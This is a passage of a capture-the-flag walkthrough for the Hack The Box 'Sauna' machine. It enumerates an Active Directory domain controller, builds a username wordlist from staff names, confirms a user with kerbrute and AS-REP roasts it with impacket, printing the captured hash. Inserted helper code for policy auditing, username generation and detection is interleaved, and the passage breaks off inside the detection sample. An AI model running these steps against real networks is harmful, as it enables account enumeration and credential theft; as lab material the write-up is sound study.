HTB - Sauna


Nmap Scan

Let's perform an nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 01:34 EDT
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-28 12:39:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m09s
| smb2-time: 
|   date: 2022-03-28T12:39:35
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.16 seconds

It looks like an Active Directory environment; let's scan a wider port range for other services too,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 01:38 EDT
Nmap scan report for 10.10.10.175
Host is up (0.29s latency).
Not shown: 9986 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds

There are other services running too, notably wsman (5985) and adws (9389)

Enumeration

From the nmap scan we can conclude that the domain name of the AD is EGOTISTICAL-BANK.LOCAL (the trailing "0." that nmap prints after it is not part of the name; the ldapsearch output below confirms this)

It has 53/tcp (DNS) and 389/tcp (LDAP) open, alongside Kerberos on 88/tcp, from which we can conclude that this machine is a Domain Controller

We also have 5985/tcp (wsman) open, from which we can say that PowerShell Remoting (WinRM) is enabled on this host

Enumerating SMB

From the SMB script scan of nmap,

| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

We cannot use SMB relay attacks to gain initial access, since SMB signing is enabled and required

Trying anonymous login over SMB,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.175 -u monish -p fake
[!] Authentication error on 10.10.10.175
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.175                  
[+] IP: 10.10.10.175:445        Name: 10.10.10.175                                      
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbclient -L //10.10.10.175 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

SMB requires authentication to access resources

Enumerating RPC

We can enumerate RPC using a null session (empty username, no password),

┌──(kaliaidenpearce369)-[~]
└─$ rpcclient 10.10.10.175 -U "" -N
rpcclient $> help

...

We have access over RPC, so we can use rpcclient commands to passively enumerate the AD domain

Enumerating the AD domain,

rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

This fails because a null session does not have sufficient privileges for these RPC queries

If we obtain valid credentials for a domain user, we can use them to run these queries

Enumerating LDAP

Let's use ldapsearch to perform basic queries against the domain,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK
 ,DC=LOCAL
serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configu
 ration,DC=EGOTISTICAL-BANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 98378
dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL
defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
currentTime: 20220328131302.0Z
configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                         

Getting the root domain info,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base rootDomainNamingContext 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: rootDomainNamingContext 
#

#
dn:
rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Getting all naming contexts to query the LDAP,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Querying with DC=EGOTISTICAL-BANK,DC=LOCAL,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x  -b "DC=egotistical-bank,DC=local" 
# extended LDIF
#
# LDAPv3
# base <DC=egotistical-bank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20220328123305.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAAA8U
 hgDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
 AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
 TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 132929443854949217
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOT
 ISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
 m Data,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
 cipals,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
 EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=E
 GOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTIC
 AL-BANK,DC=LOCAL
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
 DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICA
 L-BANK,DC=LOCAL
objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,D
 C=LOCAL
isCriticalSystemObject: TRUE
gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=Syste
 m,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
dSCorePropagationData: 16010101000000.0Z
otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Servic
 e Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Na
 me,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-N
 ame,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-NcType: 0
msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
dc: EGOTISTICAL-BANK

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL

# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL

# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL

# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL

# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL

# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL

# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL

# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL

# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL

# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL

# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL

# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC
 AL

# search result
search: 2
result: 0 Success

# numResponses: 19
# numEntries: 15
# numReferences: 3

This one seems different,

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

Now querying with CN=users,DC=egotistical-bank,DC=local,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x  -b "CN=users,DC=egotistical-bank,DC=local"
# extended LDIF
#
# LDAPv3
# base <CN=users,DC=egotistical-bank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Not much information to proceed with; we still do not know the users inside this domain
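The domain object returned by the subtree query above also carries the domain's password policy (minPwdLength, lockoutThreshold, maxPwdAge and so on), which ldapsearch prints as LDIF with long values folded onto continuation lines. As an added example that is not part of the original writeup, here is a small LDIF parser that unfolds those lines and audits the policy attributes. The sample LDIF is constructed from the attribute lines shown above (including one folded value), and the 12-character baseline in audit_password_policy is this example's assumption, not a value from the page.

```python
# Added example (not from the original writeup): parse ldapsearch LDIF output and
# audit the domain password policy it exposes. Sample input is constructed from the
# attribute lines in the subtree query above, including one folded line.
LDIF_SAMPLE = """\
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
dc: EGOTISTICAL-BANK

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
"""


def unfold_ldif(text):
    """Join LDIF continuation lines: a line beginning with a single space
    continues the previous attribute value (RFC 2849 line folding)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries, each mapping attribute name -> list of values.
    A '::' separator marks a base64-encoded value; it is kept with a 'base64:' prefix."""
    entries, current = [], None
    for line in unfold_ldif(text):
        if not line.strip():
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        name, _, value = line.partition(":")
        value = "base64:" + value[1:].strip() if value.startswith(":") else value.strip()
        if name == "dn":
            current = {"dn": [value]}
        elif current is not None:
            current.setdefault(name, []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def ad_interval_to_seconds(value):
    """AD stores these durations as negative counts of 100-nanosecond ticks."""
    return abs(int(value)) // 10_000_000


def audit_password_policy(domain_entry, min_length=12):
    """Summarise the policy attributes and return (policy, findings).
    The 12-character minimum is this example's baseline, not a value from the page."""
    policy = {
        "min_length": int(domain_entry["minPwdLength"][0]),
        "history": int(domain_entry["pwdHistoryLength"][0]),
        "complexity": bool(int(domain_entry["pwdProperties"][0]) & 0x1),  # DOMAIN_PASSWORD_COMPLEX
        "lockout_threshold": int(domain_entry["lockoutThreshold"][0]),
        "lockout_duration_min": ad_interval_to_seconds(domain_entry["lockoutDuration"][0]) // 60,
        "max_age_days": ad_interval_to_seconds(domain_entry["maxPwdAge"][0]) // 86400,
        "min_age_days": ad_interval_to_seconds(domain_entry["minPwdAge"][0]) // 86400,
    }
    findings = []
    if policy["lockout_threshold"] == 0:
        findings.append("lockoutThreshold is 0: accounts never lock out after failed logons")
    if policy["min_length"] < min_length:
        findings.append(f"minPwdLength {policy['min_length']} is below the {min_length} baseline")
    if not policy["complexity"]:
        findings.append("password complexity is not enforced")
    return policy, findings


if __name__ == "__main__":
    domain = parse_ldif(LDIF_SAMPLE)[0]
    policy, findings = audit_password_policy(domain)
    print(domain["dn"][0], policy)
    for finding in findings:
        print("finding:", finding)
```

On the values shown on this page the audit reports a 42-day maximum password age, a 1-day minimum age, a 30-minute lockout duration, and two findings: no lockout threshold and a 7-character minimum length.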

Enumerating Web Service

From the nmap script scan we got this as the result for http 80,

80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE

This is how the web page looks,

Scrolling further, there is an email submission form where we could try phishing for initial access

Even though if we send it, we cannot get the NTLM hashes on our responder since SMB signing is enabled

On the About page we can see the employee names, which we can use to build candidate usernames for brute-forcing

Creating a wordlist for usernames,

┌──(kaliaidenpearce369)-[~]
└─$ nano sauna-users.txt        
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cat sauna-users.txt          
fergus.smith
smith.fergus
f.smith
smith.f
fsmith
smithf
s.fergus
fergus.s
sfergus
ferguss
shaun.coins
coins.shaun
shaun.c
c.shaun
shaunc
cshaun
coins.s
s.coins
coinss
scoins
sophie.driver
driver.sophie
sophie.d
d.sophie
sophied
dsophie
driver.s
s.driver
sdriver
drviers
bowie.taylor
taylor.bowie
bowie.t
t.bowie
bowiet
tbowie
taylor.b
b.taylor
btaylor
taylorb
hugo.bear
bear.hugo
bear.h
h.bear
hbear
bearh
hugo.b
b.hugo
hugob
bhugo
steven.kerb
kerb.steven
steven.k
k.steven
stevenk
ksteven
kerb.s
s.kerb
kerbs
skerb
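The wordlist above applies the same ten naming conventions to each employee name. As an added example (not the writeup's own code), the following script generates those candidates from the names listed on the About page, so the list can be reproduced without typing it by hand; it also makes plain which account-name formats a defender should expect to be guessed from a public staff listing.

```python
# Added example (not from the original writeup): generate the same ten naming
# conventions per employee that the wordlist above was typed out by hand.
# The names are the ones the writeup took from the site's About page.
EMPLOYEES = [
    "Fergus Smith", "Shaun Coins", "Sophie Driver",
    "Bowie Taylor", "Hugo Bear", "Steven Kerb",
]


def username_candidates(full_name):
    """Ten common username conventions for one 'First Last' name, lowercased."""
    first, last = full_name.lower().split()
    f, l = first[0], last[0]
    return [
        f"{first}.{last}", f"{last}.{first}",   # fergus.smith, smith.fergus
        f"{f}.{last}", f"{last}.{f}",           # f.smith, smith.f
        f"{f}{last}", f"{last}{f}",             # fsmith, smithf
        f"{l}.{first}", f"{first}.{l}",         # s.fergus, fergus.s
        f"{l}{first}", f"{first}{l}",           # sfergus, ferguss
    ]


def build_wordlist(names):
    """Candidates for every name, de-duplicated while preserving order."""
    seen, out = set(), []
    for name in names:
        for candidate in username_candidates(name):
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


if __name__ == "__main__":
    print("\n".join(build_wordlist(EMPLOYEES)))
```

For the six names on the page this yields the same 60 candidates the manual list contains (with "drivers" spelled correctly), and fsmith, the one that turns out to be valid, is the fifth entry.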

Enumerating Kerberos

From the nmap scan we have,

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-28 12:39:12Z)

Let's try brute-forcing Kerberos with kerbrute to find valid usernames,

┌──(kaliaidenpearce369)-[~]
└─$ kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL sauna-users.txt --dc 10.10.10.175

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/28/22 - Ronnie Flathers @ropnop

2022/03/28 02:51:25 >  Using KDC(s):
2022/03/28 02:51:25 >   10.10.10.175:88

2022/03/28 02:51:31 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
2022/03/28 02:51:33 >  Done! Tested 60 usernames (1 valid) in 7.217 seconds

So fsmith is a valid username in the domain EGOTISTICAL-BANK.LOCAL

Initial Access

Let's try the impacket tools to perform some Kerberos attacks on the domain,

Let's try to grab the AD users; this should probably fail, since we couldn't query them over LDAP either

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetADUsers egotistical-bank.local/  -dc-ip 10.10.10.175 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying 10.10.10.175 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------

Let's use impacket-GetNPUsers to request an AS-REP (the encrypted TGT response) for the user, which works if DONT_REQUIRE_PREAUTH is set in the user's UAC flags

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers egotistical-bank.local/fsmith -no-pass  -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$e56b731631b9749da7556bc103b8c5e525eef18e806ca299db0b2b235d6137293d11a4b86ffa06909bf4d4393a311a6a2d683098f675ce59551d7f8fb0107eee6b11959c82142523234523c95b26b1b8e4c0db5ee14387496c58ffe3cb1e00fdf9252388b3e69094244945cb5b08f2f3e5c9bc04167fc693af1285e24a727f95d689f1729bf346e68460902ba6ae08d2ce1e5b3b971f0fab921207313b0adf63a1714017a622e98f6013877751542d191fad0a3f7ebc4ece804e99eec831c5ad7c1b6bc01eb813a5d7312878ecb3037a5911c208a1e1a5aa4498e85b84399fadf77302ffdbe33eb161d1cac571b1edadf630ef3d4c500a14a8aec71407878c92

So the user fsmith is vulnerable to AS-REP roasting
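On the defending side, both of the Kerberos steps above leave distinctive traces in the domain controller's Security log. kerbrute's userenum sends an AS-REQ for every guessed name, and each non-existent name produces a 4768 failure with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), so a burst of those from one source is the enumeration signature; the GetNPUsers request shows up as a successful 4768 with Pre-Authentication Type 0 and, for the $krb5asrep$23$ format obtained here, Ticket Encryption Type 0x17 (RC4). The detection logic below is an added example, not part of the writeup. The event records are constructed and flattened to one pipe-separated line per event (the field names are those of the real 4768 event; the line layout is this example's own), and the source address 10.10.14.4 is the attacking host's IP as used later on this page.

```python
from collections import defaultdict

# Added example (not from the original writeup): detection logic for the two
# Kerberos techniques above, run over constructed Security event 4768 records.
# One record per line: timestamp|TargetUserName|IpAddress|Status|PreAuthType|TicketEncryptionType
# (field names as in the real 4768 event; the flattened layout is this example's own).
SAMPLE_4768 = """\
2022-03-28T02:51:25|fergus.smith|10.10.14.4|0x6|-|0xffffffff
2022-03-28T02:51:25|smith.fergus|10.10.14.4|0x6|-|0xffffffff
2022-03-28T02:51:26|f.smith|10.10.14.4|0x6|-|0xffffffff
2022-03-28T02:51:26|smith.f|10.10.14.4|0x6|-|0xffffffff
2022-03-28T02:51:27|smithf|10.10.14.4|0x6|-|0xffffffff
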